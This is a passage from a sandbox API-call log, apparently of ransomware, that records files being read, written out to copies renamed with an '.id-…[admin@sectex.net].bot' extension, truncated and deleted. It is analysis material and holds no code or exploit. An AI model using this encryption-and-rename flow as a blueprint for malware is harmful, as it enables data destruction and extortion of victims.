	[0144.573] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01160_.WMF") returned 63
	[0144.573] lstrlenW (lpString=".zip") returned 4
	[0144.573] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0144.573] lstrlenW (lpString=".rar") returned 4
	[0144.573] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0144.574] lstrlenW (lpString=".bz2") returned 4
	[0144.574] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0144.574] lstrlenW (lpString=".7z") returned 3
	[0144.574] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0144.574] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01160_.WMF") returned 63
	[0144.574] lstrlenW (lpString=".dbf") returned 4
	[0144.574] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0144.574] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01160_.WMF") returned 63
	[0144.574] lstrlenW (lpString=".1cd") returned 4
	[0144.574] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0144.574] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01160_.WMF") returned 63
	[0144.574] lstrlenW (lpString=".jpg") returned 4
	[0144.574] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0144.574] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01160_.WMF") returned 63
	[0144.574] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01160_.WMF") returned 63
	[0144.574] lstrlenW (lpString=".doc") returned 4
	[0144.574] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0144.574] lstrlenW (lpString=".docx") returned 5
	[0144.574] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0144.574] lstrlenW (lpString=".pdf") returned 4
	[0144.574] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0144.574] lstrlenW (lpString=".xls") returned 4
	[0144.574] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0144.574] lstrlenW (lpString=".xlsx") returned 5
	[0144.574] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0144.574] lstrlenW (lpString=".ppt") returned 4
	[0144.574] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0144.574] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01160_.WMF") returned 63
	[0144.574] lstrlenW (lpString=".zip") returned 4
	[0144.574] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0144.574] lstrlenW (lpString=".rar") returned 4
	[0144.574] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0144.575] lstrlenW (lpString=".bz2") returned 4
	[0144.575] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0144.575] lstrlenW (lpString=".7z") returned 3
	[0144.575] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0144.575] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01160_.WMF") returned 63
	[0144.575] lstrlenW (lpString=".dbf") returned 4
	[0144.575] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0144.575] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01160_.WMF") returned 63
	[0144.575] lstrlenW (lpString=".1cd") returned 4
	[0144.575] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0144.575] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01160_.WMF") returned 63
	[0144.575] lstrlenW (lpString=".jpg") returned 4
	[0144.575] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0144.575] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0144.575] lstrlenW (lpString="DD01162_.WMF") returned 12
	[0144.575] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01162_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01162_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c
	[0144.576] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=2300) returned 1
	[0144.576] CloseHandle (hObject=0x31c) returned 1
	[0144.576] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01162_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01162_.wmf")) returned 0x20
	[0144.576] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01162_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01162_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0144.576] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01162_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01162_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c
	[0144.576] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0144.576] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0144.576] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01162_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01162_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c
	[0144.577] GetLastError () returned 0x0
	[0144.577] ReadFile (in: hFile=0x31c, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x8fc, lpOverlapped=0x0) returned 1
	[0144.578] WriteFile (in: hFile=0x25c, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0x900, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0x900, lpOverlapped=0x0) returned 1
	[0144.579] ReadFile (in: hFile=0x31c, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x0, lpOverlapped=0x0) returned 1
	[0144.579] WriteFile (in: hFile=0x25c, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0144.579] SetEndOfFile (hFile=0x25c) returned 1
	[0144.579] CloseHandle (hObject=0x25c) returned 1
	[0144.579] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0144.579] SetEndOfFile (hFile=0x31c) returned 1
	[0144.581] CloseHandle (hObject=0x31c) returned 1
	[0144.581] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01162_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0144.582] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01162_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01162_.wmf")) returned 1
	[0144.582] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01162_.WMF") returned 63
	[0144.582] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01162_.WMF") returned 63
	[0144.582] lstrlenW (lpString=".doc") returned 4
	[0144.582] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0144.582] lstrlenW (lpString=".docx") returned 5
	[0144.582] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0144.582] lstrlenW (lpString=".pdf") returned 4
	[0144.582] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0144.582] lstrlenW (lpString=".xls") returned 4
	[0144.582] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0144.582] lstrlenW (lpString=".xlsx") returned 5
	[0144.582] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0144.582] lstrlenW (lpString=".ppt") returned 4
	[0144.582] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0144.582] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01162_.WMF") returned 63
	[0144.582] lstrlenW (lpString=".zip") returned 4
	[0144.582] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0144.583] lstrlenW (lpString=".rar") returned 4
	[0144.583] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0144.583] lstrlenW (lpString=".bz2") returned 4
	[0144.583] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0144.583] lstrlenW (lpString=".7z") returned 3
	[0144.583] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0144.583] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01162_.WMF") returned 63
	[0144.583] lstrlenW (lpString=".dbf") returned 4
	[0144.583] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0144.583] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01162_.WMF") returned 63
	[0144.583] lstrlenW (lpString=".1cd") returned 4
	[0144.583] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0144.583] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01162_.WMF") returned 63
	[0144.583] lstrlenW (lpString=".jpg") returned 4
	[0144.583] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0144.583] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01162_.WMF") returned 63
	[0144.583] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01162_.WMF") returned 63
	[0144.583] lstrlenW (lpString=".doc") returned 4
	[0144.583] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0144.583] lstrlenW (lpString=".docx") returned 5
	[0144.583] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0144.583] lstrlenW (lpString=".pdf") returned 4
	[0144.583] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0144.583] lstrlenW (lpString=".xls") returned 4
	[0144.583] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0144.583] lstrlenW (lpString=".xlsx") returned 5
	[0144.583] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0144.583] lstrlenW (lpString=".ppt") returned 4
	[0144.583] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0144.583] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01162_.WMF") returned 63
	[0144.583] lstrlenW (lpString=".zip") returned 4
	[0144.583] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0144.583] lstrlenW (lpString=".rar") returned 4
	[0144.584] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0144.584] lstrlenW (lpString=".bz2") returned 4
	[0144.584] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0144.584] lstrlenW (lpString=".7z") returned 3
	[0144.584] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0144.584] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01162_.WMF") returned 63
	[0144.584] lstrlenW (lpString=".dbf") returned 4
	[0144.584] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0144.584] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01162_.WMF") returned 63
	[0144.584] lstrlenW (lpString=".1cd") returned 4
	[0144.584] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0144.584] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01162_.WMF") returned 63
	[0144.584] lstrlenW (lpString=".jpg") returned 4
	[0144.584] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0144.584] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0144.584] lstrlenW (lpString="DD01163_.WMF") returned 12
	[0144.584] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01163_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01163_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c
	[0144.585] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=2300) returned 1
	[0144.585] CloseHandle (hObject=0x31c) returned 1
	[0144.585] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01163_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01163_.wmf")) returned 0x20
	[0144.585] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01163_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01163_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0144.585] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01163_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01163_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c
	[0144.585] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0144.585] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0144.585] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01163_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01163_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c
	[0144.586] GetLastError () returned 0x0
	[0144.586] ReadFile (in: hFile=0x31c, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x8fc, lpOverlapped=0x0) returned 1
	[0144.587] WriteFile (in: hFile=0x25c, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0x900, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0x900, lpOverlapped=0x0) returned 1
	[0144.589] ReadFile (in: hFile=0x31c, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x0, lpOverlapped=0x0) returned 1
	[0144.589] WriteFile (in: hFile=0x25c, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0144.589] SetEndOfFile (hFile=0x25c) returned 1
	[0144.589] CloseHandle (hObject=0x25c) returned 1
	[0144.589] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0144.589] SetEndOfFile (hFile=0x31c) returned 1
	[0144.591] CloseHandle (hObject=0x31c) returned 1
	[0144.591] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01163_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0144.592] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01163_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01163_.wmf")) returned 1
	[0144.593] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01163_.WMF") returned 63
	[0144.593] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01163_.WMF") returned 63
	[0144.593] lstrlenW (lpString=".doc") returned 4
	[0144.593] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0144.593] lstrlenW (lpString=".docx") returned 5
	[0144.593] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0144.593] lstrlenW (lpString=".pdf") returned 4
	[0144.593] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0144.593] lstrlenW (lpString=".xls") returned 4
	[0144.594] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0144.594] lstrlenW (lpString=".xlsx") returned 5
	[0144.594] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0144.594] lstrlenW (lpString=".ppt") returned 4
	[0144.594] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0144.594] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01163_.WMF") returned 63
	[0144.594] lstrlenW (lpString=".zip") returned 4
	[0144.594] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0144.594] lstrlenW (lpString=".rar") returned 4
	[0144.594] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0144.594] lstrlenW (lpString=".bz2") returned 4
	[0144.594] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0144.594] lstrlenW (lpString=".7z") returned 3
	[0144.594] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0144.594] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01163_.WMF") returned 63
	[0144.594] lstrlenW (lpString=".dbf") returned 4
	[0144.594] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0144.594] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01163_.WMF") returned 63
	[0144.594] lstrlenW (lpString=".1cd") returned 4
	[0144.594] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0144.594] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01163_.WMF") returned 63
	[0144.594] lstrlenW (lpString=".jpg") returned 4
	[0144.594] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0144.594] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01163_.WMF") returned 63
	[0144.594] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01163_.WMF") returned 63
	[0144.594] lstrlenW (lpString=".doc") returned 4
	[0144.594] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0144.594] lstrlenW (lpString=".docx") returned 5
	[0144.594] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0144.594] lstrlenW (lpString=".pdf") returned 4
	[0144.594] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0144.595] lstrlenW (lpString=".xls") returned 4
	[0144.595] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0144.595] lstrlenW (lpString=".xlsx") returned 5
	[0144.595] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0144.595] lstrlenW (lpString=".ppt") returned 4
	[0144.595] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0144.595] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01163_.WMF") returned 63
	[0144.595] lstrlenW (lpString=".zip") returned 4
	[0144.595] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0144.595] lstrlenW (lpString=".rar") returned 4
	[0144.595] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0144.595] lstrlenW (lpString=".bz2") returned 4
	[0144.595] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0144.595] lstrlenW (lpString=".7z") returned 3
	[0144.595] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0144.595] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01163_.WMF") returned 63
	[0144.595] lstrlenW (lpString=".dbf") returned 4
	[0144.595] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0144.595] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01163_.WMF") returned 63
	[0144.595] lstrlenW (lpString=".1cd") returned 4
	[0144.595] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0144.595] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01163_.WMF") returned 63
	[0144.595] lstrlenW (lpString=".jpg") returned 4
	[0144.595] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0144.595] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0144.595] lstrlenW (lpString="DD01166_.WMF") returned 12
	[0144.595] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01166_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01166_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c
	[0144.597] GetFileSizeEx (in: hFile=0x25c, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=2080) returned 1
	[0144.597] CloseHandle (hObject=0x25c) returned 1
	[0144.597] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01166_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01166_.wmf")) returned 0x20
	[0144.597] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01166_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01166_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0144.597] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01166_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01166_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c
	[0144.597] SetFilePointerEx (in: hFile=0x25c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0144.597] SetFilePointerEx (in: hFile=0x25c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0144.597] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01166_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01166_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4
	[0144.598] GetLastError () returned 0x0
	[0144.598] ReadFile (in: hFile=0x25c, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x820, lpOverlapped=0x0) returned 1
	[0144.700] WriteFile (in: hFile=0x3b4, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0x830, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0x830, lpOverlapped=0x0) returned 1
	[0144.701] ReadFile (in: hFile=0x25c, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x0, lpOverlapped=0x0) returned 1
	[0144.701] WriteFile (in: hFile=0x3b4, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0144.702] SetEndOfFile (hFile=0x3b4) returned 1
	[0144.702] CloseHandle (hObject=0x3b4) returned 1
	[0144.702] SetFilePointerEx (in: hFile=0x25c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0144.702] SetEndOfFile (hFile=0x25c) returned 1
	[0144.704] CloseHandle (hObject=0x25c) returned 1
	[0144.704] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01166_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0144.914] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01166_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01166_.wmf")) returned 1
	[0144.915] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01166_.WMF") returned 63
	[0144.915] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01166_.WMF") returned 63
	[0144.915] lstrlenW (lpString=".doc") returned 4
	[0144.915] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0144.915] lstrlenW (lpString=".docx") returned 5
	[0144.915] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0144.915] lstrlenW (lpString=".pdf") returned 4
	[0144.915] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0144.915] lstrlenW (lpString=".xls") returned 4
	[0144.915] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0144.916] lstrlenW (lpString=".xlsx") returned 5
	[0144.916] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0144.916] lstrlenW (lpString=".ppt") returned 4
	[0144.916] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0144.916] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01166_.WMF") returned 63
	[0144.916] lstrlenW (lpString=".zip") returned 4
	[0144.916] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0144.916] lstrlenW (lpString=".rar") returned 4
	[0144.916] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
